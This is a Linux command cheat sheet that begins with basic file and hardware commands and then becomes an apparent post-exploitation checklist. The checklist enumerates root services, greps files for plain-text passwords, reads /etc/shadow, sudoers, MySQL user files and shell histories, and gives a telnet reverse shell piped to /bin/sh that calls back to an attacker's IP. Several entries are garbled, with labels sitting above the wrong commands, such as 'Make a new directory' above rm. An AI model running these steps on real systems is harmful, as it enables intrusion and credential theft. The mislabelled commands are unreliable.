Ultimate Linux Commands Cheat Sheet

Linux is now everywhere, you should try Linux. In Linux, commands are everything. Following commands common commands they most used.

File Commands

List files in the directory:

List all files (shows hidden files):

ls -a

Show directory you are currently working in:

pwd

Create a new directory:

mkdir [directory]

Make a new directory

*rm [file_name] *

Remove a directory recursively

rm -rf [directory_name]

It deletes the directory

cp [file_name1] [file_name2]

Recursively copy the contents of one file to a second file:

cp -r [directory_name1] [directory_name2]

Rename [file_name1] to [file_name2] with the command:

mv [file_name1] [file_name2]

Create a symbolic link to a file:

ln -s /path/to/[file_name] [link_name]

Create a new file:

touch [file_name]

Hardware Information

Show bootup messages:

dmesg

See CPU information:

cat /proc/cpuinfo

Display free and used memory with:

free -h

List hardware configuration information:

lshw

See information ablshwout block devices:

lsblk

Show PCI devices in a tree-like diagram:

lspci -tv

Display USB devices in a tree-like diagram:

lsusb -tv

Show hardware information from the BIOS:

dmidecode

Display disk data information:

hdparm -i /dev/disk

Conduct a read-speed test on device/disk:

hdparm -tT /dev/[device]

Test for unreadable blocks on device/disk:

badblocks -s /dev/[device]

What's the kernel version? Is it 64-bit?

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz-

What can be learned from the environmental variables?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

Operating System

What's the distribution type? What version?

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux

ps -ef

top

cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root

ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk '$1 ~ /^.r./

What jobs are scheduled?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]

grep -i pass [filename]

grep -C 5 "password" [filename]

find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a

cat /etc/network/interfaces

cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L

hostname

dnsdomainname

What other users & hosts are communicating with the system?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

last

Whats cached? IP and/or MAC addresses

arp -e

route

/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)

nc -lvp 4445 # Attacker. Ouput (Results)

telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?**

who

last

cat /etc/passwd | cut -d: -f1 # List of users

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users

awk -F: '($3 == "0") {print}' /etc/passwd # List of super users

cat /etc/sudoers

sudo -l

What sensitive files can be found?

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/

ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files, or log files? Default paths and locations for passwords

cat /var/apache2/config.inc

cat /var/lib/mysql/mysql/user.MYD

cat /root/anaconda-ks.cfg

What has the user is doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history

cat ~/.php_history

What user information can be found?